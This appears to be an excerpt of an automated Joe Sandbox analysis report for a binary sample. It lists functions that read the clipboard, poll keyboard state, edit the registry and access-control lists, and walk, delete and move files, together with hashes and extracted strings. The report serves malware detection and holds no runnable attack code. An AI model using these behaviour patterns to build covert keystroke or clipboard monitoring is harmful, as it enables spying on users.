IsClipboardFormatAvailable.USER32(0000000D), ref: 007B4292
GetClipboardData.USER32(0000000D), ref: 007B429A
CloseClipboard.USER32 ref: 007B42A6
GlobalLock.KERNEL32(00000000), ref: 007B42C2
CloseClipboard.USER32 ref: 007B42CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 007B42E1
IsClipboardFormatAvailable.USER32(00000001), ref: 007B42EE
GetClipboardData.USER32(00000001), ref: 007B42F6
GlobalLock.KERNEL32(00000000), ref: 007B4303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 007B4337
CloseClipboard.USER32 ref: 007B4447

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: a40044d86857dd0bf581310e82da6512ba81ade6190d72997a307fa160a7f621
Instruction ID: df8f51ab2f1d6061a0b28c7d2ea4d4b8c4195883e1ebf16076063392dc2c3f41
Opcode Fuzzy Hash: a40044d86857dd0bf581310e82da6512ba81ade6190d72997a307fa160a7f621
Instruction Fuzzy Hash: 75518371204301ABD711EF64EC89FAE77A9AF44B01F10852DF596D21A2DF78D904CB66

Function 007AC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007AC9F8
FindClose.KERNEL32(00000000), ref: 007ACA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007ACA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007ACA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 007ACAAF
__swprintf.LIBCMT ref: 007ACAFB
__swprintf.LIBCMT ref: 007ACB3E

Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82

__swprintf.LIBCMT ref: 007ACB92

Part of subcall function 007638D8: __woutput_l.LIBCMT ref: 00763931

__swprintf.LIBCMT ref: 007ACBE0

Part of subcall function 007638D8: __flsbuf.LIBCMT ref: 00763953
Part of subcall function 007638D8: __flsbuf.LIBCMT ref: 0076396B

__swprintf.LIBCMT ref: 007ACC2F
__swprintf.LIBCMT ref: 007ACC7E
__swprintf.LIBCMT ref: 007ACCCD

Strings

%02d, xrefs: 007ACB86, 007ACB90, 007ACBDE, 007ACC2D, 007ACC7C, 007ACCCB
%4d, xrefs: 007ACB38
%4d%02d%02d%02d%02d%02d, xrefs: 007ACAF5

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 578ab1df48215cb02efea6df9600cb8c3843d654fbfcf201fee30cc8831e1794
Instruction ID: 3f0b56185a9f89e8de69deb7256f62108f8b8891c7e7f012151c28695021bf13
Opcode Fuzzy Hash: 578ab1df48215cb02efea6df9600cb8c3843d654fbfcf201fee30cc8831e1794
Instruction Fuzzy Hash: FAA1FDB1508305EBC714EB64C88ADAFB7ECEF95700F404919F686D7191EB38DA09CB62

Function 007AF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007AF221
_wcscmp.LIBCMT ref: 007AF236
_wcscmp.LIBCMT ref: 007AF24D
GetFileAttributesW.KERNEL32(?), ref: 007AF25F
SetFileAttributesW.KERNEL32(?,?), ref: 007AF279
FindNextFileW.KERNEL32(00000000,?), ref: 007AF291
FindClose.KERNEL32(00000000), ref: 007AF29C
FindFirstFileW.KERNEL32(*.*,?), ref: 007AF2B8
_wcscmp.LIBCMT ref: 007AF2DF
_wcscmp.LIBCMT ref: 007AF2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 007AF308
SetCurrentDirectoryW.KERNEL32(007FA5A0), ref: 007AF326
FindNextFileW.KERNEL32(00000000,00000010), ref: 007AF330
FindClose.KERNEL32(00000000), ref: 007AF33D
FindClose.KERNEL32(00000000), ref: 007AF34F

Strings

*.*, xrefs: 007AF2B3

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 7c0a2da5612747de0adc66a228d914dacf95d1e7318bef0bab8190625b6e2afd
Instruction ID: 1851c8d5babab9318ec505238b7f1fb6db7a2a208509cc22fb276e21ee9b4217
Opcode Fuzzy Hash: 7c0a2da5612747de0adc66a228d914dacf95d1e7318bef0bab8190625b6e2afd
Instruction Fuzzy Hash: A431C3B65002196ADF10DBF4DC88EEE73ACAF8A361F104279E905D3090EB38DE45CA54

Function 007C0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C0BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,007CF910,00000000,?,00000000,?,?), ref: 007C0C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007C0C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007C0D1D
RegCloseKey.ADVAPI32(?), ref: 007C103D
RegCloseKey.ADVAPI32(00000000), ref: 007C104A

Strings

REG_EXPAND_SZ, xrefs: 007C0CBA
REG_MULTI_SZ, xrefs: 007C0E05
REG_QWORD, xrefs: 007C0F8B
REG_BINARY, xrefs: 007C0FD8
REG_SZ, xrefs: 007C0D5B
REG_DWORD, xrefs: 007C0F0E

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: de6c2b53bf3912e059d751ebeda32cf2abe6e1181c9d0c65b360956372ffbe44
Instruction ID: 1abc9cb66e1b594668df6643b242b1e73f2b71009483b42779e6c855feec1b37
Opcode Fuzzy Hash: de6c2b53bf3912e059d751ebeda32cf2abe6e1181c9d0c65b360956372ffbe44
Instruction Fuzzy Hash: 2F023975200651DFCB14EF24C885E2AB7E5EF89714F04896DF98A9B362DB38ED41CB81

Function 007AF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007AF37E
_wcscmp.LIBCMT ref: 007AF393
_wcscmp.LIBCMT ref: 007AF3AA

Part of subcall function 007A45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007A45DC

FindNextFileW.KERNEL32(00000000,?), ref: 007AF3D9
FindClose.KERNEL32(00000000), ref: 007AF3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 007AF400
_wcscmp.LIBCMT ref: 007AF427
_wcscmp.LIBCMT ref: 007AF43E
SetCurrentDirectoryW.KERNEL32(?), ref: 007AF450
SetCurrentDirectoryW.KERNEL32(007FA5A0), ref: 007AF46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 007AF478
FindClose.KERNEL32(00000000), ref: 007AF485
FindClose.KERNEL32(00000000), ref: 007AF497

Strings

*.*, xrefs: 007AF3FB

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 61c5a8f3bdc7c6c670919affcaed963c07c65236fc284cd2f375ac7e907678a2
Instruction ID: c30a10736f4666d54d22544af4b4e8da5e0fcf75c1f58755723b01840362da13
Opcode Fuzzy Hash: 61c5a8f3bdc7c6c670919affcaed963c07c65236fc284cd2f375ac7e907678a2
Instruction Fuzzy Hash: 9431D5715012596ECF109BA4EC88EEE77AD9F8A361F104379E814A31A0DB3CDE44CA64

Function 007981F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0079874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00798766
Part of subcall function 0079874A: GetLastError.KERNEL32(?,0079822A,?,?,?), ref: 00798770
Part of subcall function 0079874A: GetProcessHeap.KERNEL32(00000008,?,?,0079822A,?,?,?), ref: 0079877F
Part of subcall function 0079874A: HeapAlloc.KERNEL32(00000000,?,0079822A,?,?,?), ref: 00798786
Part of subcall function 0079874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0079879D

Part of subcall function 007987E7: GetProcessHeap.KERNEL32(00000008,00798240,00000000,00000000,?,00798240,?), ref: 007987F3
Part of subcall function 007987E7: HeapAlloc.KERNEL32(00000000,?,00798240,?), ref: 007987FA
Part of subcall function 007987E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00798240,?), ref: 0079880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0079825B
_memset.LIBCMT ref: 00798270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0079828F
GetLengthSid.ADVAPI32(?), ref: 007982A0
GetAce.ADVAPI32(?,00000000,?), ref: 007982DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007982F9
GetLengthSid.ADVAPI32(?), ref: 00798316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00798325
HeapAlloc.KERNEL32(00000000), ref: 0079832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0079834D
CopySid.ADVAPI32(00000000), ref: 00798354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00798385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007983AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 007983BF

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 825f2407e1c9cb99342158d357c493feabffb7fb1556399f424470dafdf3257b
Instruction ID: 7a5116eb561cbd34984838952514d343cd861b64476dc9dca586f4a549858d6b
Opcode Fuzzy Hash: 825f2407e1c9cb99342158d357c493feabffb7fb1556399f424470dafdf3257b
Instruction Fuzzy Hash: 61613971904209EFDF00DFA4EC85EAEBBB9FF05700F14816AE815A6291DB399A05CB61

Function 00756843 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

UTF16), xrefs: 00791508
CR), xrefs: 007916C0
NO_START_OPT), xrefs: 00791588
BSR_UNICODE), xrefs: 00791771
LIMIT_MATCH=, xrefs: 007915A9
ANYCRLF), xrefs: 00791734
Oau, xrefs: 00791888, 0079192F, 007919DD
NO_AUTO_POSSESS), xrefs: 00791567
UTF), xrefs: 00791533
LIMIT_RECURSION=, xrefs: 00791635
LF), xrefs: 007916DD
UCP), xrefs: 00791546
CRLF), xrefs: 007916FA
BSR_ANYCRLF), xrefs: 00791757
PJ~, xrefs: 007568B3
ANY), xrefs: 00791717

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oau$PJ~$UCP)$UTF)$UTF16)
API String ID: 0-828581819
Opcode ID: 7eb3373821aafb5da998f88982cebc285664450ac29c808f77a059cb354472b2
Instruction ID: 8938c6d6f51021ab549feb54e2042aaa3f729f2c5e5a16bbeee3e608de97305b
Opcode Fuzzy Hash: 7eb3373821aafb5da998f88982cebc285664450ac29c808f77a059cb354472b2
Instruction Fuzzy Hash: FE727F75E0021ADBDF24CF58D8807EEB7B5EF48310F54816AE949EB290EB789D45CB90

Function 007C0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C0038,?,?), ref: 007C10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C0737

Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007C07D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007C086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007C0AAD
RegCloseKey.ADVAPI32(00000000), ref: 007C0ABA

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 7a5b300987fbc6294ac6eeff352bc22a8a6de8cfb57bd95977f97479ac702a9c
Instruction ID: 430a941068353ad6dad19057d7b350e8f589e277640d0a7c0475f2b806a835a4
Opcode Fuzzy Hash: 7a5b300987fbc6294ac6eeff352bc22a8a6de8cfb57bd95977f97479ac702a9c
Instruction Fuzzy Hash: EDE13C71204210EFCB14DF24C895E6BBBE9EF89714B04C56DF84ADB2A2DB34E905CB91

Function 007A0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 007A0241
GetAsyncKeyState.USER32(000000A0), ref: 007A02C2
GetKeyState.USER32(000000A0), ref: 007A02DD
GetAsyncKeyState.USER32(000000A1), ref: 007A02F7
GetKeyState.USER32(000000A1), ref: 007A030C
GetAsyncKeyState.USER32(00000011), ref: 007A0324
GetKeyState.USER32(00000011), ref: 007A0336
GetAsyncKeyState.USER32(00000012), ref: 007A034E
GetKeyState.USER32(00000012), ref: 007A0360
GetAsyncKeyState.USER32(0000005B), ref: 007A0378
GetKeyState.USER32(0000005B), ref: 007A038A

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 36d6833821de6db8375f75e7e740a92c678bb9a9ef9577e98ca23561f475842d
Instruction ID: 25c5fe31ef890036561ca30a251d0a0f38243889afba7e1b0718aa5fe845dd15
Opcode Fuzzy Hash: 36d6833821de6db8375f75e7e740a92c678bb9a9ef9577e98ca23561f475842d
Instruction Fuzzy Hash: 2041C9345047C96EFF318B6498087A5BEA17F93340F088A9DD6C6461C2E79D99D887E2

Function 007B4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 007B447F
EmptyClipboard.USER32 ref: 007B4485
GlobalAlloc.KERNEL32(00000002,?), ref: 007B449A
CloseClipboard.USER32 ref: 007B4539

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 26d156c9d61f971ae334436a9fc10025f19ae7fa520cedcaf5151d53330ec9ca
Instruction ID: e8012865574ce5fb7efda2e0a6e7f489e0ae59fa5fa9bcab6764ffe5884be503
Opcode Fuzzy Hash: 26d156c9d61f971ae334436a9fc10025f19ae7fa520cedcaf5151d53330ec9ca
Instruction Fuzzy Hash: 65213D352006109FDB10AF64EC49FAE77A9EF44711F14C02AF946EB2A2DB78AD11CB59

Function 007A3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 007448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007448A1,?,?,007437C0,?), ref: 007448CE

Part of subcall function 007A4CD3: GetFileAttributesW.KERNEL32(?,007A3947), ref: 007A4CD4

FindFirstFileW.KERNEL32(?,?), ref: 007A3ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007A3B87
MoveFileW.KERNEL32(?,?), ref: 007A3B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007A3BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 007A3BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 007A3BF5

Strings

\*.*, xrefs: 007A3A8A, 007A3A93, 007A3AA8

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: e3b1f6c3d44ff7bc63af925c3646f38543e8112660430b498dd46de90d0ef6ee
Instruction ID: 5186b8ff125b3cfda5e67ae8d447d7e8c5a1ceb368ee4ecbeddc4d99493ca17f
Opcode Fuzzy Hash: e3b1f6c3d44ff7bc63af925c3646f38543e8112660430b498dd46de90d0ef6ee
Instruction Fuzzy Hash: 16517E31801158EBCF05EFA0CD969EDB779AF56300F648269F44677092DF296F09CB60

Function 00754140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 007544ED
VUUU, xrefs: 00787B0C
VUUU, xrefs: 00754520
ERCP, xrefs: 0075421F
Oau, xrefs: 00754984, 00788173
VUUU, xrefs: 007544DB

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID:
String ID: ERCP$Oau$VUUU$VUUU$VUUU$VUUU
API String ID: 0-2652741529
Opcode ID: 5f3f6c77e567cdb688c0e5948db6eb84e93a17e89d24c8752c2b1414d749f673
Instruction ID: 3f9f82d57e7566dc4c831d7c593feb0fc5e74e6cfdb429290712b0723367bc37
Opcode Fuzzy Hash: 5f3f6c77e567cdb688c0e5948db6eb84e93a17e89d24c8752c2b1414d749f673
Instruction Fuzzy Hash: 77A28E70E0421ACBDF28DF58C9847EDB7B1FB54319F2481A9D816A7240E7789EC9CB51

Function 007AF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007AF6AB
Sleep.KERNEL32(0000000A), ref: 007AF6DB
_wcscmp.LIBCMT ref: 007AF6EF
_wcscmp.LIBCMT ref: 007AF70A
FindNextFileW.KERNEL32(?,?), ref: 007AF7A8
FindClose.KERNEL32(00000000), ref: 007AF7BE

Strings

*.*, xrefs: 007AF690

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
